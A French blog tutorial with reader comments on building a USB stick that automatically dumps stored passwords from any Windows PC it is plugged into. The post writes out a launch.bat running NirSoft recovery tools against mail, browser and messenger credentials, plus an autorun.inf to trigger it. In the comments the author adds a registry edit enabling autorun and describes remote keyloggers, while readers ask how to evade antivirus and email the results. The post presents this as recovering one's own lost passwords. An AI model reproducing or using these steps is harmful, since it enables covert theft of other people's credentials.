TUTO HACK: Création d’une clé USB rootkit

adata-909-thumb-drive

Aujourd’hui nous allons voir comment créer une clé USB qui récupère les mots de passe d’un ordinateur. Ce rootkit s’exécute automatiquement et récupère la plupart des mots de passe stocker sur votre ordinateur. Il est vraiment très utile surtout quand on a perdu ses mots de passe.

Pour créer notre rootkit on doit suivre les étapes suivantes:

Étape 1

Nous allons dans un premier temps télécharger quelque logiciels qui nous permettent de déchiffrer les mots de passe des applications les plus courantes. Toutes ces applications sont issues du site Nirsoft (http://www.nirsoft.net/).

  • MessenPass
  • Mail PassView
  • ChromePass
  • IE Passview
  • PasswordFox
  • Protected Storage PassView
  • Network Password Recovery
  • WirelessKeyView


usb1 TUTO HACK: Création d’une clé USB rootkit

Voici le Packs complets :  http://www.multiupload.nl/W9C4LACNTW

puis nous allons placez tous les fichier .exe  sur notre clé USB.

Étape 2

Ensuite il nous faut créé un fichier launch.bat qui va ouvrir les programmes de récupération de mot de passe et il va  stocker les résultats dans un fichier texte.
Pour cela : on doit créer un nouveau document texte avec bloc note ou autres et écrire le code ci-dessous.

start mspass.exe /stext dossier1/mspass.txt
start mailpv.exe /stext dossier/mailpv.txt
start pspv.exe /stext dossier1/pspv.txt
start iepv.exe /stext dossier1/iepv.txt
start PasswordFox.exe /stext dossier1/PasswordFox.txt
start ChromePass.exe /stext dossier1/ChromePass.txt

Attention a bien vérifier que les noms de fichiers correspondent bien aux noms de launch.bat .

Comme vous avez pu le voir dans les lignes ci dessus, lorsque le logiciel sera exécutez , ces logs seront envoyé dans un dossier appelé dossier1. Il nous faut donc créé un nouveau dossier.

Étape 3

Maintenant nous devons créer le fichier autorun.inf

Lorsque vous insérez votre cléf USB généralement une fenêtre apparaît en nous demandant ce que l’on désire faire !
Dans cette étape nous allons créé une nouvelle option dans cette fenêtre , qui nous permettra ( une fois cliquez dessus ) de récupérez les mots de passes du pc et de les stockés dans le dossier créé dans l’étape 2 .

Pour réalisez ceci on ouvre un nouveau document texte puis on insère ce code :

[autorun]

open=launch.bat

ACTION="Le nom de la nouvelle option"

Puis on enregistre sous : autorun.inf
Notre rootkit est maintenant près, il ne reste plus qu’à le tester. icon biggrin TUTO HACK: Création d’une clé USB rootkit


Pour plus de nouveautés, merci de vous abonner à la newsletter du blog ou à son flux RSS. N’hésitez pas aussi à faire un tour sur Twitter, Google+ ou encore Facebook pour d’autres news.

Ceux qui ont aimé cet article ont également apprécié ceux-là :

Recherches qui ont permis de trouver cet article:

stocker mot de passe fichier sur clé usb, rootkit usb, USB hack, cle usb hack, usb rootkit, comment hacker un compte fb, hacker clé usb, hack clé USB, tuto rootkit, cle usb pirate

You can skip to the end and leave a response. Pinging is currently not allowed.
  • Jerzey

    Salut !

    J’ai crée ce rootkit très sympa.

    Cependant voici mes observations et problèmes rencontrés (en espérant que tu puisses les résoudre) :

    – L’autorun + .bat sont bien implanté sur mon usb, cependant ils ne se lancent pas tout seul quand l’usb est inséré, il faut que l’user du PC, de manière voulue, clique sur l’icône launch.

    – Le soft pour Firefox ne fonctionne cependant pas. J’ai toujours un message d’erreur sur tous les pc utilisé.

    – Y aurait-il possibilité d’ajouter quelques lignes de code afin que le script crée un nouveau fichier texte nommé par exemple : MDP1 MDP2 etc etc plutôt que d’écraser à chaque fois l’ancien ? (Je ne connais pas la prog, néanmoins je pourrais chercher à faire ça, j’ai déjà fait pas mal de .bat mais je dois jouer avec les livres de commande :))

    • nik

      J’ai le même problème :

      Impossible de lancer automatiquement l’autorun.
      Cela pourrait il venir de ma clé?

  • Ahmed El Jaouari

    Hi Jerzey,

    Merci pour votre lecture de cet article :)

    – Alors je commence par le premier problème, c’est a cause de l’autorun, sur certain ordinateur l’autorun est désactivé. Pour activer l’autorun, aller dans Menu Démarrer → Exécuter → (taper regedit.exe)
    Dans l’arborescence de la base de registre aller dans : [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer], modifier la clé suivante, avec la valeur 91 « NoDriveTypeAutoRun »=dword:00000091 enfin redémarre ton PC.

    – Pour le deuxième problème, essaie de télécharger la dernier version du PasswordFox sur http://www.nirsoft.net/utils/passwordfox.html

    – Enfin pour éviter l’écrasement des anciens fichiers, on peut ajouter la commande « %random% » au fichier lunch.bat:
    start mspass.exe /stext Mdp/mspass%random%.txt

    J’espère avoir t’aider Jerzey et a bientôt :D

  • Jerzey

    Poy Ahmed,

    Un grand merci à toi !

    Le script « %random% » fonctionne très bien.

    J’ai mis à jour via nirsoft.net et effectivement le mien n’était pas à jour.

    Continue de publier tes articles, je les dévore à chaque fois =)

  • AbuM@lek

    Salam Ahmed,

    La plupart des outils sont détectés comme Trojan/Virus (Faux alertes)

    La question est comment peut on contourner l’antivirus pour ne pas les détecter !!!
    parceque sinon, sa n’a pas d’importance la fonction d’automatiser les lancement.

    Merci pour le tuto ^^.

    A.M@

  • AbuM@lek

    Bjr,
    Autre chose,
    Quand j’essaye, sur win 7 mêm apres que j’ai modifié le clé de registre, j’obtiens la fenêtre d’exécution automatique qui permet de choisir le type d’applications,
    donc le script ne s’éxecute pas automatiquement !!!

  • http://www.funinformatique.com/ Ahmed

    Salut tristan, merci pour l’interet que tu portes a notre blog. Alors pour le truc du mail c’est pas possible, parce que le batch est tres limité à l’ensemble des commandes disponible dans cmd.exe par contre il existe des remotes keylogger qui vous permettent de faire ca ! :)

    • tristan

      salut elahmed jaimerai en savoir plus de se que vous avez dit a propos qu’ il existe des remotes keylogger  merci de me repondre vite et bonne journee 

  • http://www.funinformatique.com/ Ahmed

    Oui biensur, c’est le meme principe ! :)

  • Sam 0409

    salut stp c quoi un fichier rootkit et comment je le crie meme chose pr launch bat reponds moi stp
     

  • noName

    Salut c’était pour savoir pourquoi quand j’exécute le launch.bat manuellement j’ai 
    « ERROR 5 : Accés refusé »?
    Et aussi savoir pk l’autorun ne propose « le nom de la nouvelle option » dans le panneau qui s’affiche quand on met la clé usb?
    merci bcp et j’adore tes tutos mec!

    • kivoshki

      Pour voir le nom s’afficher tu dois autoriser l’exécution automatique de l’autorun.
      Pour activer l’autorun, Menu Démarrer -> Exécuter -> regedit.exe

      Tu cherche :[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorer]

      et tu modifie la valeur de la clé en 91
      « NoDriveTypeAutoRun »=dword:00000091

  • Imadnohad

    ‘ Dans l’arborescence de la base de registre aller dans : [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorer], modifier la clé suivante, avec la valeur 91 « NoDriveTypeAutoRun »=dword:00000091 enfin redémarre ton PC.’ Peut on faire cette modification pour chaque pc à qui on connecte la clé usb ??

  • tristan

    Salut, comme par hasard j’ai pommé tout le pack et j’aimerais le ravoir mais ton lien n’es plus valide il marche plus, si c’est possible de le remettre a nouveaux 

    j’ai essayer de le faire avec le tuto mais il me donne des erreurs. Merci de me répondre très vite. Vous m’avez parler aussi des remotes keylogger, j’aimerai en savoir plus et savoir qu’est ce que c’est.Merci d’avance et continuer comme ça. Ca déchire chaque jour, je lis vos article et celui la est mon préféré 

    répondez moi  vite !
     

    • http://www.funinformatique.com/ Ahmed

      Bonsoir tristan, ravie de te revoir ! :)  tu as raison le lien du pack est mort, je l’ai changé par un autre, tu peux mnt télécharger tout le pack comme avant !

      En ce qui concerne Remote keylogger, c’est un logiciel espion invisible pour surveiller tous les aspects de l’activité des utilisateurs. Il envoie à l’adresse email indiquée chaque frappe tapé dans un ordinateur et des capture d’écrans à intervalles réguliers… 

  • tristan

    Salut, je suis de retour une autre fois. Désolé pour le dérangement mais le lien est toujours mort, il y a t’il un lien torrent ou un site pour l’avoir ? Merci de m’avoir répondu !

    • http://www.funinformatique.com/ Ahmed

      Ca marche parfaitement pour moi,  peux tu vérifier encore une fois ? Sinon tu peux tjrs les telecharger sur le site origine: http://www.nirsoft.net/password_recovery_tools.html

      • tristan

         effectivement sa fonctionne merci ! 

  • Prestige

    salut!
    merci pour votre tuto ca ma vraiment aider je vous remercie.
    j’ai une toute petite question peut être vous paraître idiote mais bon j prend le risque :)
    « Le nom de la nouvelle option »  il s’agit de quoi? qu’est ce que j dois marqué?
    merci d’avance et bonne continuation vraiment super votre site.

  • http://www.facebook.com/arnaud.freeze.7 Arnaud MrFreeze

    Bonjour,comment desactiver la demande d’autorisation d’execution de « WirelessKeyView » ??? merci

  • Phaerd

    Bonjour, j’aimerais savoir, peut-on contourner le problème des anti-virus? C’est à dire que dès que j’insère ma clé usb, mon pc la détecte comme malveillante et supprime donc tout les fichiers qui lui paraissent infectés.

  • disqus_nmV7yVNPp3

    salam
    merci pour le tuto deja ^^
    on fait mon probleme c dans l’autorun.inf ca me crée pas une nouvel option quoi que je fasse :(

  • toto

    une erreur c glisser ligne 2 etape 2

    et si une personne pouvait me dire pour que l’envoie se fasse par mail automatiquement

    cordialement

  • Remi

    Bonjour quand je telecharge les fichiers ce sont des .ini et non des .exe est ce normal?

  • Stark

    lien mort ! merci de renouveler

  • Draytane

    top, tres bon tuto :-) personellement j’ai préféré faire une ou deux retouches, pour commencé j’ai mis les exe dans un dossier nommé « temp » (pour plus de discrétion)

    mais j’ai laissé le fichier ini et le bat à la racine.
    Puis j’ai modifié le bat comme ceci :

    « mkdir dossier
    start temp/ChromePass.exe /stext dossier/chrome.txt
    start temp/iepv.exe /stext dossier/iexplorer.txt
    start temp/mailpv.exe /stext dossier/mail.txt
    start temp/mspass.exe /stext dossier/mspass.txt
    start temp/PasswordFox.exe /stext dossier/netpass.txt
    start temp/pspv.exe /stext dossier/pspv.txt »
    comme ça il crée le dossier lui même, je trouve cela plus pratique. mais j’ai dû me séparer des exe qui demandaient confirmations :,-(

  • alexy

    bonjour a tous sa ne marche ,je n’arrive pas a recuperai tous les mot de passe d’un coup et je suis sur windows 7
    quelqu’un pourrait m aider svp

  • Jyfezz

    Bonsoir ! Perso, ça ne marche pas pour mailpv et pspv :(
    Et je voulais savoir si cela fonctionne aussi sur marque et quel logiciel faut-il télécharger pour Safari ?

  • giorgio

    salut à tous,

    je suis désolé mais je n’arrive pas à tout comprendre dans l’installation des fichiers. Je n’arrive pas à avoir comme sur l’image ci-dessu (à avoir ces fichiers).
    Tous est écris en anglais….

    j’ai seulement réussi à faire le dossier Autorun et Launch mais RIEN ne marche…

    peut ont m’aider SVP ?

    Merci

    • trolo

      Moi j’ai tout réussi… En anglais? normal…
      J’ai tous télécharger depuis des sites differents….

  • SweetHome A L A B A M A

    Lien mort, ce serait encore plus cool comme tuto si seulement les liens fonctionnaient

  • Alexandre B.

    Je pourrait metre quoi a la place de « l’option » je suis a cour d’idée ?

  • gb88

    bonjour et un immense merci pour ce tuto ! tout fonctionne tres bien mais je suis obligé de lancer le .bat par moi meme car la nouvelle option ne s’affiche pas… je suis sur Windows 8 cela a peut etre une incidence.. quelq’un peut-il m’éclairer svp ? merci !!

  • Krm

    Moyen le autorun marche pas…

  • Joo

    Bonjour, je crois que je vais télécharger les logiciels 1 à 1 car le pack ne donne pas les fichiers .exe de la liste ..? ou alors, éclairez ma lanterne please. Merci!

  • jaja

    quand je télécharge les ficher ne sont pas .exe mais .ini c’est normal?